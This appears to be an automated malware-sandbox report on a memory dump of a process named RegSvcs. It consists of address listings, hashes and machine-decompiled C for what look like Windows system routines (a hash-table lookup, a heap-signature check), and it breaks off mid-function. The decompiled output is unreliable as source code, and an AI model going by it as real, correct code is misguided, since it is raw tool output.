                                          0x01303db5
                                          0x01303dba
                                          0x01303dba
                                          0x01303dd4
                                          0x01303e94
                                          0x01303eab
                                          0x01303f6d
                                          0x01303f84
                                          0x0130406b
                                          0x0130406b
                                          0x0130406e
                                          0x0130406e
                                          0x01304070
                                          0x01304074
                                          0x01358351
                                          0x01358351
                                          0x0130407a
                                          0x0130407f
                                          0x0135835d
                                          0x01358370
                                          0x01358377
                                          0x01358379
                                          0x0135837c
                                          0x0135837c
                                          0x0135835d
                                          0x00000000
                                          0x0130407f
                                          0x01303f8a
                                          0x01303f8d
                                          0x01303f90
                                          0x01303f95
                                          0x0135830d
                                          0x0135830f
                                          0x01303f9b
                                          0x01303fac
                                          0x01303fae
                                          0x01303fb1
                                          0x01303fb1
                                          0x01303fb6
                                          0x01358317
                                          0x0135831a
                                          0x00000000
                                          0x01303fbc
                                          0x01303fc1
                                          0x01303fc9
                                          0x01303fd7
                                          0x01303fda
                                          0x01303fdd
                                          0x01304021
                                          0x01304021
                                          0x01304029
                                          0x01304030
                                          0x01304044
                                          0x01304046
                                          0x01304046
                                          0x01304044
                                          0x01304049
                                          0x01358327
                                          0x01358334
                                          0x01358339
                                          0x0135833c
                                          0x0130404f
                                          0x0130404f
                                          0x0130404f
                                          0x01304051
                                          0x01304056
                                          0x01304063
                                          0x01304063
                                          0x01304068
                                          0x00000000
                                          0x01304068
                                          0x01303fdf
                                          0x01303fe2
                                          0x01303fe4
                                          0x01303fe7
                                          0x01303fef
                                          0x01304003
                                          0x01304005
                                          0x01304005
                                          0x0130400c
                                          0x01304013
                                          0x01304016
                                          0x01304017
                                          0x0130401b
                                          0x0130401e
                                          0x00000000
                                          0x0130401e
                                          0x01303fb6
                                          0x01303eb1
                                          0x01303eb4
                                          0x01303eb7
                                          0x01303ebc
                                          0x013582a9
                                          0x013582ab
                                          0x01303ec2
                                          0x01303ed3
                                          0x01303ed5
                                          0x01303ed8
                                          0x01303ed8
                                          0x01303edd
                                          0x013582b3
                                          0x013582b6
                                          0x00000000
                                          0x01303ee3
                                          0x01303ee8
                                          0x01303eed
                                          0x01303ef0
                                          0x01303ef3
                                          0x01303f02
                                          0x01303f05
                                          0x01303f08
                                          0x013582c0
                                          0x013582c3
                                          0x013582c5
                                          0x013582c8
                                          0x013582d0
                                          0x013582e4
                                          0x013582e6
                                          0x013582e6
                                          0x013582ed
                                          0x013582f4
                                          0x013582f7
                                          0x013582f8
                                          0x013582fc
                                          0x013582ff
                                          0x013582ff
                                          0x01303f0e
                                          0x01303f11
                                          0x01303f16
                                          0x01303f1d
                                          0x01303f31
                                          0x01358307
                                          0x01358307
                                          0x01303f31
                                          0x01303f39
                                          0x01303f48
                                          0x01303f4d
                                          0x01303f50
                                          0x01303f50
                                          0x01303f53
                                          0x01303f58
                                          0x01303f65
                                          0x01303f65
                                          0x01303f6a
                                          0x00000000
                                          0x01303f6a
                                          0x01303edd
                                          0x01303dda
                                          0x01303ddd
                                          0x01303de0
                                          0x01303de5
                                          0x01358245
                                          0x01303deb
                                          0x01303df7
                                          0x01303dfc
                                          0x01303dfe
                                          0x01303e01
                                          0x01303e01
                                          0x01303e06
                                          0x0135824d
                                          0x0135824f
                                          0x01358254
                                          0x00000000
                                          0x01303e0c
                                          0x01303e11
                                          0x01303e16
                                          0x01303e19
                                          0x01303e29
                                          0x01303e2c
                                          0x01303e2f
                                          0x0135825c
                                          0x0135825f
                                          0x01358261
                                          0x01358264
                                          0x0135826c
                                          0x01358280
                                          0x01358282
                                          0x01358282
                                          0x01358289
                                          0x01358290
                                          0x01358293
                                          0x01358294
                                          0x01358298
                                          0x0135829b
                                          0x0135829b
                                          0x01303e35
                                          0x01303e38
                                          0x01303e3d
                                          0x01303e44
                                          0x01303e58
                                          0x013582a3
                                          0x013582a3
                                          0x01303e58
                                          0x01303e60
                                          0x01303e6f
                                          0x01303e74
                                          0x01303e77
                                          0x01303e77
                                          0x01303e7a
                                          0x01303e7f
                                          0x01303e8c
                                          0x01303e8c
                                          0x01303e91
                                          0x00000000
                                          0x01303e91

                                          Strings
                                          • Kernel-MUI-Number-Allowed, xrefs: 01303D8C
                                          • Kernel-MUI-Language-Allowed, xrefs: 01303DC0
                                          • Kernel-MUI-Language-Disallowed, xrefs: 01303E97
                                          • Kernel-MUI-Language-SKU, xrefs: 01303F70
                                          • WindowsExcludedProcs, xrefs: 01303D6F
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                          • API String ID: 0-258546922
                                          • Opcode ID: 2e60296a2044c69497d498322fdfd3cda965d6eedd5cabbbc41b0a04d929a44a
                                          • Instruction ID: 5e85a71e64e4f0ed85f8fdbac82da180ad99b537329e8218fc1593cb7a62ef25
                                          • Opcode Fuzzy Hash: 2e60296a2044c69497d498322fdfd3cda965d6eedd5cabbbc41b0a04d929a44a
                                          • Instruction Fuzzy Hash: A0F15B72D00619EFCB16DF99C990EEEBBF9FF48654F14406AE905A7650E7309E01CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 013CE824 Relevance: 6.5, APIs: 4, Instructions: 493timeCOMMONCrypto
                                          Download Yara Rule
                                          C-Code - Quality: 50%
                                          			E013CE824(signed int __ecx, signed int* __edx) {
				signed int _v8;
				signed char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				unsigned int _v44;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t177;
				signed int _t179;
				unsigned int _t202;
				signed char _t207;
				signed char _t210;
				signed int _t230;
				void* _t244;
				unsigned int _t247;
				signed int _t288;
				signed int _t289;
				signed int _t291;
				signed char _t293;
				signed char _t295;
				signed char _t298;
				intOrPtr* _t303;
				signed int _t310;
				signed char _t316;
				signed int _t319;
				signed char _t323;
				signed char _t330;
				signed int _t334;
				signed int _t337;
				signed int _t341;
				signed char _t345;
				signed char _t347;
				signed int _t353;
				signed char _t354;
				void* _t383;
				signed char _t385;
				signed char _t386;
				unsigned int _t392;
				signed int _t393;
				signed int _t395;
				signed int _t398;
				signed int _t399;
				signed int _t401;
				unsigned int _t403;
				void* _t404;
				unsigned int _t405;
				signed int _t406;
				signed char _t412;
				unsigned int _t413;
				unsigned int _t418;
				void* _t419;
				void* _t420;
				void* _t421;
				void* _t422;
				void* _t423;
				signed char* _t425;
				signed int _t426;
				signed int _t428;
				unsigned int _t430;
				signed int _t431;
				signed int _t433;

				_v8 =  *0x13ed360 ^ _t433;
				_v40 = __ecx;
				_v16 = __edx;
				_t289 = 0x4cb2f;
				_t425 = __edx[1];
				_t403 =  *__edx << 2;
				if(_t403 < 8) {
					L3:
					_t404 = _t403 - 1;
					if(_t404 == 0) {
						L16:
						_t289 = _t289 * 0x25 + ( *_t425 & 0x000000ff);
						L17:
						_t426 = _v40;
						_v20 = _t426 + 0x1c;
						_t177 = L0131FAD0(_t426 + 0x1c);
						_t385 = 0;
						while(1) {
							L18:
							_t405 =  *(_t426 + 4);
							_t179 = (_t177 | 0xffffffff) << (_t405 & 0x0000001f);
							_t316 = _t289 & _t179;
							_v24 = _t179;
							_v32 = _t316;
							_v12 = _t316 >> 0x18;
							_v36 = _t316 >> 0x10;
							_v28 = _t316 >> 8;
							if(_t385 != 0) {
								goto L21;
							}
							_t418 = _t405 >> 5;
							if(_t418 == 0) {
								_t406 = 0;
								L31:
								if(_t406 == 0) {
									L35:
									E0131FA00(_t289, _t316, _t406, _t426 + 0x1c);
									 *0x13eb1e0(0xc +  *_v16 * 4,  *((intOrPtr*)(_t426 + 0x28)));
									_t319 =  *((intOrPtr*)( *((intOrPtr*)(_t426 + 0x20))))();
									_v36 = _t319;
									if(_t319 != 0) {
										asm("stosd");
										asm("stosd");
										asm("stosd");
										_t408 = _v16;
										 *(_t319 + 8) =  *(_t319 + 8) & 0xff000001 | 0x00000001;
										 *((char*)(_t319 + 0xb)) =  *_v16;
										 *(_t319 + 4) = _t289;
										_t53 = _t319 + 0xc; // 0xc
										E01312280(E0133F3E0(_t53,  *((intOrPtr*)(_v16 + 4)),  *_v16 << 2), _v20);
										_t428 = _v40;
										_t386 = 0;
										while(1) {
											L38:
											_t202 =  *(_t428 + 4);
											_v16 = _v16 | 0xffffffff;
											_v16 = _v16 << (_t202 & 0x0000001f);
											_t323 = _v16 & _t289;
											_v20 = _t323;
											_v20 = _v20 >> 0x18;
											_v28 = _t323;
											_v28 = _v28 >> 0x10;
											_v12 = _t323;
											_v12 = _v12 >> 8;
											_v32 = _t323;
											if(_t386 != 0) {
												goto L41;
											}
											_t247 = _t202 >> 5;
											_v24 = _t247;
											if(_t247 == 0) {
												_t412 = 0;
												L50:
												if(_t412 == 0) {
													L53:
													_t291 =  *(_t428 + 4);
													_v28 =  *((intOrPtr*)(_t428 + 0x28));
													_v44 =  *(_t428 + 0x24);
													_v32 =  *((intOrPtr*)(_t428 + 0x20));
													_t207 = _t291 >> 5;
													if( *_t428 < _t207 + _t207) {
														L74:
														_t430 = _t291 >> 5;
														_t293 = _v36;
														_t210 = (_t207 | 0xffffffff) << (_t291 & 0x0000001f) &  *(_t293 + 4);
														_v44 = _t210;
														_t159 = _t430 - 1; // 0xffffffdf
														_t428 = _v40;
														_t330 =  *(_t428 + 8);
														_t386 = _t159 & (_v44 >> 0x00000018) + ((_v44 >> 0x00000010 & 0x000000ff) + ((_t210 >> 0x00000008 & 0x000000ff) + ((_t210 & 0x000000ff) + 0x00b15dcb) * 0x00000025) * 0x00000025) * 0x00000025;
														_t412 = _t293;
														 *_t293 =  *(_t330 + _t386 * 4);
														 *(_t330 + _t386 * 4) = _t293;
														 *_t428 =  *_t428 + 1;
														_t289 = 0;
														L75:
														E0130FFB0(_t289, _t412, _t428 + 0x1c);
														if(_t289 != 0) {
															_t428 =  *(_t428 + 0x24);
															 *0x13eb1e0(_t289,  *((intOrPtr*)(_t428 + 0x28)));
															 *_t428();
														}
														L77:
														return E0133B640(_t412, _t289, _v8 ^ _t433, _t386, _t412, _t428);
													}
													_t334 = 2;
													_t207 = E0132F3D5( &_v24, _t207 * _t334, _t207 * _t334 >> 0x20);
													if(_t207 < 0) {
														goto L74;
													}
													_t413 = _v24;
													if(_t413 < 4) {
														_t413 = 4;
													}
													 *0x13eb1e0(_t413 << 2, _v28);
													_t207 =  *_v32();
													_t386 = _t207;
													_v16 = _t386;
													if(_t386 == 0) {
														_t291 =  *(_t428 + 4);
														if(_t291 >= 0x20) {
															goto L74;
														}
														_t289 = _v36;
														_t412 = 0;
														goto L75;
													} else {
														_t108 = _t413 - 1; // 0x3
														_t337 = _t108;
														if((_t413 & _t337) == 0) {
															L62:
															if(_t413 > 0x4000000) {
																_t413 = 0x4000000;
															}
															_t295 = _t386;
															_v24 = _v24 & 0x00000000;
															_t392 = _t413 << 2;
															_t230 = _t428 | 0x00000001;
															_t393 = _t392 >> 2;
															asm("sbb ecx, ecx");
															_t341 =  !(_v16 + _t392) & _t393;
															if(_t341 <= 0) {
																L67:
																_t395 = (_t393 | 0xffffffff) << ( *(_t428 + 4) & 0x0000001f);
																_v32 = _t395;
																_v20 = 0;
																if(( *(_t428 + 4) & 0xffffffe0) <= 0) {
																	L72:
																	_t345 =  *(_t428 + 8);
																	_t207 = _v16;
																	_t291 =  *(_t428 + 4) & 0x0000001f | _t413 << 0x00000005;
																	 *(_t428 + 8) = _t207;
																	 *(_t428 + 4) = _t291;
																	if(_t345 != 0) {
																		 *0x13eb1e0(_t345, _v28);
																		_t207 =  *_v44();
																		_t291 =  *(_t428 + 4);
																	}
																	goto L74;
																} else {
																	goto L68;
																}
																do {
																	L68:
																	_t298 =  *(_t428 + 8);
																	_t431 = _v20;
																	_v12 = _t298;
																	while(1) {
																		_t347 =  *(_t298 + _t431 * 4);
																		_v24 = _t347;
																		if((_t347 & 0x00000001) != 0) {
																			goto L71;
																		}
																		 *(_t298 + _t431 * 4) =  *_t347;
																		_t300 =  *(_t347 + 4) & _t395;
																		_t398 = _v16;
																		_t353 = _t413 - 0x00000001 & (( *(_t347 + 4) & _t395) >> 0x00000018) + ((( *(_t347 + 4) & _t395) >> 0x00000010 & 0x000000ff) + ((( *(_t347 + 4) & _t395) >> 0x00000008 & 0x000000ff) + ((_t300 & 0x000000ff) + 0x00b15dcb) * 0x00000025) * 0x00000025) * 0x00000025;
																		_t303 = _v24;
																		 *_t303 =  *((intOrPtr*)(_t398 + _t353 * 4));
																		 *((intOrPtr*)(_t398 + _t353 * 4)) = _t303;
																		_t395 = _v32;
																		_t298 = _v12;
																	}
																	L71:
																	_v20 = _t431 + 1;
																	_t428 = _v40;
																} while (_v20 <  *(_t428 + 4) >> 5);
																goto L72;
															} else {
																_t399 = _v24;
																do {
																	_t399 = _t399 + 1;
																	 *_t295 = _t230;
																	_t295 = _t295 + 4;
																} while (_t399 < _t341);
																goto L67;
															}
														}
														_t354 = _t337 | 0xffffffff;
														if(_t413 == 0) {
															L61:
															_t413 = 1 << _t354;
															goto L62;
														} else {
															goto L60;
														}
														do {
															L60:
															_t354 = _t354 + 1;
															_t413 = _t413 >> 1;
														} while (_t413 != 0);
														goto L61;
													}
												}
												_t89 = _t412 + 8; // 0x8
												_t244 = E013CE7A8(_t89);
												_t289 = _v36;
												if(_t244 == 0) {
													_t412 = 0;
												}
												goto L75;
											}
											_t386 =  *(_t428 + 8) + (_v24 - 0x00000001 & (_v20 & 0x000000ff) + 0x164b2f3f + (((_t323 & 0x000000ff) * 0x00000025 + (_v12 & 0x000000ff)) * 0x00000025 + (_v28 & 0x000000ff)) * 0x00000025) * 4;
											_t323 = _v32;
											while(1) {
												L41:
												_t386 =  *_t386;
												_v12 = _t386;
												if((_t386 & 0x00000001) != 0) {
													break;
												}
												if(_t323 == ( *(_t386 + 4) & _v16)) {
													L45:
													if(_t386 == 0) {
														goto L53;
													}
													if(E013CE7EB(_t386, _t408) != 0) {
														_t412 = _v12;
														goto L50;
													}
													_t386 = _v12;
													goto L38;
												}
											}
											_t386 = 0;
											_v12 = 0;
											goto L45;
										}
									}
									_t412 = 0;
									goto L77;
								}
								_t38 = _t406 + 8; // 0x8
								_t364 = _t38;
								if(E013CE7A8(_t38) == 0) {
									_t406 = 0;
								}
								E0131FA00(_t289, _t364, _t406, _v20);
								goto L77;
							}
							_t24 = _t418 - 1; // -1
							_t385 =  *((intOrPtr*)(_t426 + 8)) + (_t24 & (_v12 & 0x000000ff) + 0x164b2f3f + (((_t316 & 0x000000ff) * 0x00000025 + (_v28 & 0x000000ff)) * 0x00000025 + (_v36 & 0x000000ff)) * 0x00000025) * 4;
							_t316 = _v32;
							L21:
							_t406 = _v24;
							while(1) {
								_t385 =  *_t385;
								_v12 = _t385;
								if((_t385 & 0x00000001) != 0) {
									break;
								}
								if(_t316 == ( *(_t385 + 4) & _t406)) {
									L26:
									if(_t385 == 0) {
										goto L35;
									}
									_t177 = E013CE7EB(_t385, _v16);
									if(_t177 != 0) {
										_t406 = _v12;
										goto L31;
									}
									_t385 = _v12;
									goto L18;
								}
							}
							_t385 = 0;
							_v12 = 0;
							goto L26;
						}
					}
					_t419 = _t404 - 1;
					if(_t419 == 0) {
						L15:
						_t289 = _t289 * 0x25 + ( *_t425 & 0x000000ff);
						_t425 =  &(_t425[1]);
						goto L16;
					}
					_t420 = _t419 - 1;
					if(_t420 == 0) {
						L14:
						_t289 = _t289 * 0x25 + ( *_t425 & 0x000000ff);
						_t425 =  &(_t425[1]);
						goto L15;
					}
					_t421 = _t420 - 1;
					if(_t421 == 0) {
						L13:
						_t289 = _t289 * 0x25 + ( *_t425 & 0x000000ff);
						_t425 =  &(_t425[1]);
						goto L14;
					}
					_t422 = _t421 - 1;
					if(_t422 == 0) {
						L12:
						_t289 = _t289 * 0x25 + ( *_t425 & 0x000000ff);
						_t425 =  &(_t425[1]);
						goto L13;
					}
					_t423 = _t422 - 1;
					if(_t423 == 0) {
						L11:
						_t289 = _t289 * 0x25 + ( *_t425 & 0x000000ff);
						_t425 =  &(_t425[1]);
						goto L12;
					}
					if(_t423 != 1) {
						goto L17;
					} else {
						_t289 = _t289 * 0x25 + ( *_t425 & 0x000000ff);
						_t425 =  &(_t425[1]);
						goto L11;
					}
				} else {
					_t401 = _t403 >> 3;
					_t403 = _t403 + _t401 * 0xfffffff8;
					do {
						_t383 = ((((((_t425[1] & 0x000000ff) * 0x25 + (_t425[2] & 0x000000ff)) * 0x25 + (_t425[3] & 0x000000ff)) * 0x25 + (_t425[4] & 0x000000ff)) * 0x25 + (_t425[5] & 0x000000ff)) * 0x25 + (_t425[6] & 0x000000ff)) * 0x25 - _t289 * 0x2fe8ed1f;
						_t310 = ( *_t425 & 0x000000ff) * 0x1a617d0d;
						_t288 = _t425[7] & 0x000000ff;
						_t425 =  &(_t425[8]);
						_t289 = _t310 + _t383 + _t288;
						_t401 = _t401 - 1;
					} while (_t401 != 0);
					goto L3;
				}
			}






































































                                          0x013ce833
                                          0x013ce839
                                          0x013ce83e
                                          0x013ce841
                                          0x013ce848
                                          0x013ce84b
                                          0x013ce851
                                          0x013ce8b2
                                          0x013ce8b2
                                          0x013ce8b5
                                          0x013ce90b
                                          0x013ce911
                                          0x013ce913
                                          0x013ce913
                                          0x013ce91a
                                          0x013ce91d
                                          0x013ce922
                                          0x013ce924
                                          0x013ce924
                                          0x013ce924
                                          0x013ce92f
                                          0x013ce933
                                          0x013ce935
                                          0x013ce93a
                                          0x013ce940
                                          0x013ce948
                                          0x013ce950
                                          0x013ce955
                                          0x00000000
                                          0x00000000
                                          0x013ce957
                                          0x013ce95c
                                          0x013ce9cb
                                          0x013ce9d2
                                          0x013ce9d4
                                          0x013ce9f2
                                          0x013ce9f6
                                          0x013cea10
                                          0x013cea18
                                          0x013cea1a
                                          0x013cea1f
                                          0x013cea2c
                                          0x013cea2d
                                          0x013cea2e
                                          0x013cea32
                                          0x013cea3d
                                          0x013cea42
                                          0x013cea45
                                          0x013cea51
                                          0x013cea60
                                          0x013cea65
                                          0x013cea68
                                          0x013cea6a
                                          0x013cea6a
                                          0x013cea6a
                                          0x013cea6f
                                          0x013cea76
                                          0x013cea7c
                                          0x013cea7e
                                          0x013cea81
                                          0x013cea85
                                          0x013cea88
                                          0x013cea8c
                                          0x013cea8f
                                          0x013cea93
                                          0x013cea98
                                          0x00000000
                                          0x00000000
                                          0x013cea9a
                                          0x013cea9d
                                          0x013ceaa2
                                          0x013ceb0e
                                          0x013ceb15
                                          0x013ceb17
                                          0x013ceb33
                                          0x013ceb36
                                          0x013ceb39
                                          0x013ceb3f
                                          0x013ceb45
                                          0x013ceb4a
                                          0x013ceb52
                                          0x013cecb1
                                          0x013cecb9
                                          0x013cecbe
                                          0x013cecc3
                                          0x013cecc6
                                          0x013ceceb
                                          0x013cecee
                                          0x013cecf9
                                          0x013cecfe
                                          0x013ced00
                                          0x013ced05
                                          0x013ced07
                                          0x013ced0a
                                          0x013ced0c
                                          0x013ced0e
                                          0x013ced12
                                          0x013ced19
                                          0x013ced1e
                                          0x013ced24
                                          0x013ced2a
                                          0x013ced2a
                                          0x013ced2c
                                          0x013ced3e
                                          0x013ced3e
                                          0x013ceb5a
                                          0x013ceb62
                                          0x013ceb69
                                          0x00000000
                                          0x00000000
                                          0x013ceb6f
                                          0x013ceb75
                                          0x013ceb79
                                          0x013ceb79
                                          0x013ceb88
                                          0x013ceb8e
                                          0x013ceb90
                                          0x013ceb92
                                          0x013ceb97
                                          0x013ced3f
                                          0x013ced45
                                          0x00000000
                                          0x00000000
                                          0x013ced4b
                                          0x013ced4e
                                          0x00000000
                                          0x013ceb9d
                                          0x013ceb9d
                                          0x013ceb9d
                                          0x013ceba2
                                          0x013cebb5
                                          0x013cebbc
                                          0x013cebbe
                                          0x013cebbe
                                          0x013cebc3
                                          0x013cebc5
                                          0x013cebcb
                                          0x013cebd2
                                          0x013cebd5
                                          0x013cebdb
                                          0x013cebdf
                                          0x013cebe1
                                          0x013cebf0
                                          0x013cebf9
                                          0x013cec04
                                          0x013cec07
                                          0x013cec0a
                                          0x013cec82
                                          0x013cec85
                                          0x013cec8b
                                          0x013cec91
                                          0x013cec93
                                          0x013cec96
                                          0x013cec9b
                                          0x013ceca6
                                          0x013cecac
                                          0x013cecae
                                          0x013cecae
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x013cec0c
                                          0x013cec0c
                                          0x013cec0c
                                          0x013cec0f
                                          0x013cec12
                                          0x013cec15
                                          0x013cec15
                                          0x013cec18
                                          0x013cec1e
                                          0x00000000
                                          0x00000000
                                          0x013cec22
                                          0x013cec28
                                          0x013cec4b
                                          0x013cec5b
                                          0x013cec5d
                                          0x013cec63
                                          0x013cec65
                                          0x013cec68
                                          0x013cec6b
                                          0x013cec6b
                                          0x013cec70
                                          0x013cec71
                                          0x013cec74
                                          0x013cec7d
                                          0x00000000
                                          0x013cebe3
                                          0x013cebe3
                                          0x013cebe6
                                          0x013cebe6
                                          0x013cebe7
                                          0x013cebe9
                                          0x013cebec
                                          0x00000000
                                          0x013cebe6
                                          0x013cebe1
                                          0x013ceba4
                                          0x013ceba9
                                          0x013cebb0
                                          0x013cebb3
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x013cebab
                                          0x013cebab
                                          0x013cebab
                                          0x013cebac
                                          0x013cebac
                                          0x00000000
                                          0x013cebab
                                          0x013ceb97
                                          0x013ceb19
                                          0x013ceb1c
                                          0x013ceb21
                                          0x013ceb26
                                          0x013ceb2c
                                          0x013ceb2c
                                          0x00000000
                                          0x013ceb26
                                          0x013cead6
                                          0x013cead9
                                          0x013ceadc
                                          0x013ceadc
                                          0x013ceadc
                                          0x013ceade
                                          0x013ceae4
                                          0x00000000
                                          0x00000000
                                          0x013ceaee
                                          0x013ceaf7
                                          0x013ceaf9
                                          0x00000000
                                          0x00000000
                                          0x013ceb04
                                          0x013ceb12
                                          0x00000000
                                          0x013ceb12
                                          0x013ceb06
                                          0x00000000
                                          0x013ceb06
                                          0x013ceaf0
                                          0x013ceaf2
                                          0x013ceaf4
                                          0x00000000
                                          0x013ceaf4
                                          0x013cea6a
                                          0x013cea21
                                          0x00000000
                                          0x013cea21
                                          0x013ce9d6
                                          0x013ce9d6
                                          0x013ce9e0
                                          0x013ce9e2
                                          0x013ce9e2
                                          0x013ce9e8
                                          0x00000000
                                          0x013ce9e8
                                          0x013ce987
                                          0x013ce98f
                                          0x013ce992
                                          0x013ce995
                                          0x013ce995
                                          0x013ce998
                                          0x013ce998
                                          0x013ce99a
                                          0x013ce9a0
                                          0x00000000
                                          0x00000000
                                          0x013ce9a9
                                          0x013ce9b2
                                          0x013ce9b4
                                          0x00000000
                                          0x00000000
                                          0x013ce9ba
                                          0x013ce9c1
                                          0x013ce9cf
                                          0x00000000
                                          0x013ce9cf
                                          0x013ce9c3
                                          0x00000000
                                          0x013ce9c3
                                          0x013ce9ab
                                          0x013ce9ad
                                          0x013ce9af
                                          0x00000000
                                          0x013ce9af
                                          0x013ce924
                                          0x013ce8b7
                                          0x013ce8ba
                                          0x013ce902
                                          0x013ce908
                                          0x013ce90a
                                          0x00000000
                                          0x013ce90a
                                          0x013ce8bc
                                          0x013ce8bf
                                          0x013ce8f9
                                          0x013ce8ff
                                          0x013ce901
                                          0x00000000
                                          0x013ce901
                                          0x013ce8c1
                                          0x013ce8c4
                                          0x013ce8f0
                                          0x013ce8f6
                                          0x013ce8f8
                                          0x00000000
                                          0x013ce8f8
                                          0x013ce8c6
                                          0x013ce8c9
                                          0x013ce8e7
                                          0x013ce8ed
                                          0x013ce8ef
                                          0x00000000
                                          0x013ce8ef
                                          0x013ce8cb
                                          0x013ce8ce
                                          0x013ce8de
                                          0x013ce8e4
                                          0x013ce8e6
                                          0x00000000
                                          0x013ce8e6
                                          0x013ce8d3
                                          0x00000000
                                          0x013ce8d5
                                          0x013ce8db
                                          0x013ce8dd
                                          0x00000000
                                          0x013ce8dd
                                          0x013ce853
                                          0x013ce855
                                          0x013ce85b
                                          0x013ce85d
                                          0x013ce897
                                          0x013ce89c
                                          0x013ce8a2
                                          0x013ce8a6
                                          0x013ce8ab
                                          0x013ce8ad
                                          0x013ce8ad
                                          0x00000000
                                          0x013ce85d

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID:
                                          • API String ID: 3446177414-0
                                          • Opcode ID: eb2dc41821a36566d1161a5122f83280add726d319fd1ce278ddb8db59c296b5
                                          • Instruction ID: fa101a67d4cb17159cea5c35550c5074e2d656b7a740014776a4848690ca0161
                                          • Opcode Fuzzy Hash: eb2dc41821a36566d1161a5122f83280add726d319fd1ce278ddb8db59c296b5
                                          • Instruction Fuzzy Hash: 67029F72E006169FDB18CFADC8916BEBFF6AF88214B19817DD456EB381D634E901CB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 012F40E1 Relevance: 6.3, Strings: 5, Instructions: 51COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 29%
                                          			E012F40E1(void* __edx) {
				void* _t19;
				void* _t29;

				_t28 = _t19;
				_t29 = __edx;
				if( *((intOrPtr*)(_t19 + 0x60)) != 0xeeffeeff) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push("HEAP: ");
						E012FB150();
					} else {
						E012FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E012FB150("Invalid heap signature for heap at %p", _t28);
					if(_t29 != 0) {
						E012FB150(", passed to %s", _t29);
					}
					_push("\n");
					E012FB150();
					if( *((char*)( *[fs:0x30] + 2)) != 0) {
						 *0x13e6378 = 1;
						asm("int3");
						 *0x13e6378 = 0;
					}
					return 0;
				}
				return 1;
			}





                                          0x012f40e6
                                          0x012f40e8
                                          0x012f40f1
                                          0x0135042d
                                          0x0135044c
                                          0x01350451
                                          0x0135042f
                                          0x01350444
                                          0x01350449
                                          0x0135045d
                                          0x01350466
                                          0x0135046e
                                          0x01350474
                                          0x01350475
                                          0x0135047a
                                          0x0135048a
                                          0x0135048c
                                          0x01350493
                                          0x01350494
                                          0x01350494
                                          0x00000000
                                          0x0135049b
                                          0x00000000

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlAllocateHeap
                                          • API String ID: 0-188067316
                                          • Opcode ID: c8c0850b6627963048a195d4d6f7c482e01745bb797b55e294dd381d16fcbdb8
                                          • Instruction ID: 0af0a5bded41a8a517c9bb36475eb21aee6cef58fd2e14e1a8e88bdb3c75f45b
                                          • Opcode Fuzzy Hash: c8c0850b6627963048a195d4d6f7c482e01745bb797b55e294dd381d16fcbdb8
                                          • Instruction Fuzzy Hash: BD014C321342819ED32D9769E40EF63BBA4DB00F30F19403DF5046B781CBE59440CA11
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0131A830 Relevance: 5.4, Strings: 4, Instructions: 350COMMONCrypto
                                          Download Yara Rule
                                          C-Code - Quality: 70%
                                          			E0131A830(intOrPtr __ecx, signed int __edx, signed short _a4) {
				void* _v5;
				signed short _v12;
				intOrPtr _v16;
				signed int _v20;
				signed short _v24;
				signed short _v28;
				signed int _v32;
				signed short _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				signed short* _v52;
				void* __ebx;
				void* __edi;
				void* __ebp;
				signed int _t131;
				signed char _t134;
				signed int _t138;
				char _t141;
				signed short _t142;
				void* _t146;
				signed short _t147;
				intOrPtr* _t149;
				intOrPtr _t156;
				signed int _t167;
				signed int _t168;
				signed short* _t173;
				signed short _t174;
				intOrPtr* _t182;
				signed short _t184;
				intOrPtr* _t187;
				intOrPtr _t197;
				intOrPtr _t206;
				intOrPtr _t210;
				signed short _t211;
				intOrPtr* _t212;
				signed short _t214;
				signed int _t216;
				intOrPtr _t217;
				signed char _t225;
				signed short _t235;
				signed int _t237;
				intOrPtr* _t238;
				signed int _t242;
				unsigned int _t245;
				signed int _t251;
				intOrPtr* _t252;
				signed int _t253;
				intOrPtr* _t255;
				signed int _t256;
				void* _t257;
				void* _t260;

